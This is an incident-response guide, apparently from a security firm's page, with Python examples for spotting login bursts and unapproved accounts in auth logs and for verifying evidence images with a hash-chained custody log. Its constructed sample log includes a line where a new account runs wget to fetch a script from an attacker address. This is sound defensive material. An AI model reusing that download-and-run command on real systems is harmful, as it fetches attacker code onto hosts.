Every organization has to be prepared for the worst, so the question is how you will handle an incident when it arrives. Preparation is key: it means being able to recognize the start of an incident, knowing how to recover and return operations to normal, and having established security policies in place. Two further aspects of preparation are training and pre-deployed incident handling assets. When training the team, consider the different kinds of training it needs, such as support for the operating systems in use, specialized investigative techniques, use of the tooling, and the procedural requirements of your corporate environment.
Pre-deployed incident handling assets are the tools you want already in place before a breach occurs. This includes sensors, probes and monitors on critical systems that you actively watch, tracking databases in core systems, and audit logging enabled on every server and network component, with the logs retained somewhere an attacker on the affected host cannot alter them.
The next stage of incident response is identifying the actual incident. The first question your team must answer is whether the event is merely unusual activity or something more. Once that has been established, examine the affected system for indicators such as suspicious entries in system or network accounting logs, excessive login attempts, unexplained new user accounts, unexpected new files, and similar signs. After you have assessed the situation, incidents are classified into six levels.
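The indicators listed above are usually the first thing a responder checks in the host's authentication log. The following is an added example, not code from the original page: it triages a handful of constructed Linux auth-log lines for a burst of failed logins, a successful login from the same source right after that burst, and a new user account that nobody approved. The log lines are constructed for illustration, and the threshold (5 failures within 60 seconds) and the approved-account list are assumptions to tune per environment.

```python
"""Triage constructed syslog auth lines for three incident indicators:
a failed-login burst, a success following the burst, and an unapproved
new account. Added example; sample data and thresholds are assumptions."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in syslog format; no real host or data.
SAMPLE_LOG = """\
Mar 10 02:14:01 web01 sshd[2211]: Failed password for invalid user admin from 203.0.113.7 port 51022 ssh2
Mar 10 02:14:03 web01 sshd[2211]: Failed password for invalid user admin from 203.0.113.7 port 51023 ssh2
Mar 10 02:14:05 web01 sshd[2211]: Failed password for root from 203.0.113.7 port 51024 ssh2
Mar 10 02:14:06 web01 sshd[2211]: Failed password for root from 203.0.113.7 port 51025 ssh2
Mar 10 02:14:08 web01 sshd[2211]: Failed password for root from 203.0.113.7 port 51026 ssh2
Mar 10 02:14:09 web01 sshd[2211]: Failed password for root from 203.0.113.7 port 51027 ssh2
Mar 10 02:14:11 web01 sshd[2212]: Accepted password for root from 203.0.113.7 port 51028 ssh2
Mar 10 02:15:30 web01 useradd[2230]: new user: name=svc_backup, UID=1007, GID=1007, home=/home/svc_backup, shell=/bin/bash
Mar 10 02:16:02 web01 sudo:  svc_backup : TTY=pts/1 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/wget http://203.0.113.7/x.sh
Mar 10 09:00:00 web01 sshd[3001]: Failed password for alice from 198.51.100.4 port 40000 ssh2
Mar 10 09:00:20 web01 sshd[3002]: Accepted publickey for alice from 198.51.100.4 port 40001 ssh2
"""

TS_RE = re.compile(r"^(\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) (\S+) ")
FAILED_RE = re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\S+)")
ACCEPT_RE = re.compile(r"sshd\[\d+\]: Accepted \w+ for (\S+) from (\S+)")
USERADD_RE = re.compile(r"useradd\[\d+\]: new user: name=([^,]+)")


def parse_line(line, year=2024):
    """Turn one syslog line into an event dict, or None if it is not syslog.
    Syslog timestamps carry no year, so one is assumed here."""
    m = TS_RE.match(line)
    if not m:
        return None
    event = {"ts": datetime.strptime(m.group(1), "%b %d %H:%M:%S").replace(year=year),
             "host": m.group(2), "kind": "other", "user": None, "src": None}
    for kind, rx in (("failed", FAILED_RE), ("accepted", ACCEPT_RE), ("useradd", USERADD_RE)):
        hit = rx.search(line)
        if hit:
            event["kind"] = kind
            event["user"] = hit.group(1)
            event["src"] = hit.group(2) if hit.lastindex == 2 else None
            break
    return event


def find_login_bursts(events, threshold=5, window=timedelta(seconds=60)):
    """Per source IP, look for >= threshold failures inside one window and
    note whether that source then authenticated successfully (the case
    that turns 'noise' into a probable compromise)."""
    by_src = defaultdict(list)
    for e in events:
        if e["kind"] == "failed":
            by_src[e["src"]].append(e)
    findings = []
    for src, fails in by_src.items():
        fails.sort(key=lambda e: e["ts"])
        for i in range(len(fails)):
            j = i
            while j + 1 < len(fails) and fails[j + 1]["ts"] - fails[i]["ts"] <= window:
                j += 1
            if j - i + 1 >= threshold:
                end = fails[j]["ts"]
                success = any(e["kind"] == "accepted" and e["src"] == src and e["ts"] >= end
                              for e in events)
                findings.append({"src": src, "failures": j - i + 1,
                                 "start": fails[i]["ts"], "end": end,
                                 "users": sorted({e["user"] for e in fails[i:j + 1]}),
                                 "followed_by_success": success})
                break  # one finding per source is enough for triage
    return findings


def find_unexplained_accounts(events, approved):
    """Accounts created on the host that are not on the approved list."""
    return [e["user"] for e in events if e["kind"] == "useradd" and e["user"] not in approved]


def triage(log_text, approved_accounts=frozenset({"root", "alice"})):
    events = [e for e in (parse_line(l) for l in log_text.splitlines()) if e]
    return {"bursts": find_login_bursts(events),
            "new_accounts": find_unexplained_accounts(events, approved_accounts)}


if __name__ == "__main__":
    for key, value in triage(SAMPLE_LOG).items():
        print(key, value)
```

The same pattern, a parser feeding small, named checks, extends to the other indicators in the paragraph (new files from an audit or file-integrity log, odd entries in process accounting); the important design point is that a burst of failures followed by a success from the same source is reported as one finding, because that combination is what separates background scanning from an account that has actually been taken over.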
Containment, the stage that follows, covers two essential areas:
- Protecting critical computing resources and keeping them available where possible
- Determining the operational status of the infected computer, system or network
To determine the operational status of the infected system or network, you have three options:
- Disconnect the system from the network and let it continue stand-alone operation
- Shut everything down immediately
- Leave the system running on the network and monitor its activity
Each of these is a viable way to contain the issue at the start of the response, and the choice should be made as soon as possible so the team can move to the next stage. The trade-offs differ: disconnecting from the network stops further spread while preserving the running state for investigation; shutting down halts the attacker at once but destroys volatile evidence such as memory contents; leaving the system connected and monitored preserves the most information about the attacker but accepts the risk of continued damage.
- We offer best-in-class incident response services for your company's IT infrastructure, and we perform advanced assessments of your application security, both manual and automated, to prepare you for future incidents.
- The business model is often overlooked, but we cover business logic testing by understanding the business process running on the system and adding business logic test cases accordingly. We have a strong understanding of typical business processes such as online trading, e-commerce, supply chain, retail banking, treasury, payroll and procurement. This lets us build in-depth business logic cases even in a routine penetration testing exercise and add far more value than a plain-vanilla penetration test in securing you against cyber attacks.
- Our testers explore the infrastructure with carefully crafted payloads and study offensive hacking techniques in order to develop defensive mechanisms.
Investigation is the first step in determining what actually happened to your system, computer or network. A systematic review needs to cover the bit-stream copies of the drives, external storage, captured real-time memory, network device logs, system logs, application logs and other supporting data. Work on the copies rather than the originals, and verify each copy against its source by hash before analysis. Keep well-written documentation of everything you do during the investigation, including who handled each piece of evidence and when, since external threats may require law enforcement involvement and the evidence may then have to withstand legal scrutiny.
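Two of the points above, verifying a bit-stream copy and documenting evidence handling, are easy to get wrong under time pressure. The following is an added example, not code from the original page: it checks that an image is byte-for-byte identical to its source by length and SHA-256, and keeps each custody step in a hash-chained log so that a later edit or deletion of an earlier entry is detectable. The "disk" is a constructed byte string and the evidence IDs and examiner names are placeholders.

```python
"""Image verification and a hash-chained custody log. Added example;
the source bytes, evidence IDs and examiner names are placeholders."""
import hashlib
import json
from datetime import datetime, timezone


def sha256_of(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def verify_image(source: bytes, image: bytes) -> bool:
    """A bit-stream copy must match its source exactly; checking the length
    as well as the digest reports a truncated copy clearly."""
    return len(source) == len(image) and sha256_of(source) == sha256_of(image)


class CustodyLog:
    """Append-only list of entries. Each entry carries the SHA-256 of the
    previous entry, so editing or removing an earlier entry breaks the chain."""

    GENESIS = "0" * 64

    def __init__(self):
        self.entries = []

    def record(self, action, examiner, evidence_id, evidence_hash, when=None):
        prev = self.entries[-1]["entry_hash"] if self.entries else self.GENESIS
        entry = {
            "seq": len(self.entries),
            "time": (when or datetime.now(timezone.utc)).isoformat(),
            "action": action,
            "examiner": examiner,
            "evidence_id": evidence_id,
            "evidence_hash": evidence_hash,
            "prev_hash": prev,
        }
        # Canonical JSON so the hash does not depend on key order.
        entry["entry_hash"] = sha256_of(json.dumps(entry, sort_keys=True).encode())
        self.entries.append(entry)
        return entry

    def verify(self) -> bool:
        """Recompute every entry hash and check the links between entries."""
        prev = self.GENESIS
        for i, e in enumerate(self.entries):
            body = {k: v for k, v in e.items() if k != "entry_hash"}
            if (e["seq"] != i or e["prev_hash"] != prev
                    or sha256_of(json.dumps(body, sort_keys=True).encode()) != e["entry_hash"]):
                return False
            prev = e["entry_hash"]
        return True


def demo():
    """Acquire a (constructed) disk, verify the copy, log both steps."""
    source = bytes(range(256)) * 64          # constructed stand-in for a disk
    image = bytes(source)                     # the bit-stream copy
    t0 = datetime(2024, 3, 10, 3, 0, tzinfo=timezone.utc)
    log = CustodyLog()
    log.record("acquire", "examiner-1", "DISK-001", sha256_of(source), when=t0)
    ok = verify_image(source, image)
    log.record("verify-image" if ok else "verify-image-FAILED", "examiner-1",
               "DISK-001", sha256_of(image), when=t0.replace(minute=20))
    return log, ok


if __name__ == "__main__":
    log, ok = demo()
    print("image verified:", ok, "| log intact:", log.verify())
    print(json.dumps(log.entries, indent=2))
```

In practice the source hash is taken by the imaging tool at acquisition time and the custody log is written to separate, write-once storage; the chaining shown here does not replace that, it only makes any later alteration of the record visible to whoever reviews it.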
Eradication is the process of actually removing the issue from your computer, system or network. This step should take place only after the external and internal actions of the preceding stages are complete and you understand how the attacker got in; otherwise the same foothold is simply re-established. There are two important aspects of eradication to keep in mind. The first is cleanup. Cleanup usually consists of running your antivirus software, uninstalling the infected software, rebuilding the OS or replacing the entire hard drive, and reconstructing the network. Bear in mind that antivirus cleanup of a host an attacker has controlled cannot be fully trusted; rebuilding from known-good media and rotating any credentials that were present on the system is the safer course.
Recovery is when your company or organization returns to normal operation. There are two steps to recovery, with a condition attached to the second:
- Service restoration, based on implementing the corporate contingency plans
- System and/or network validation: testing and certifying the system as operational
- Any component that was compromised must be re-certified as both operational and secure before it is returned to service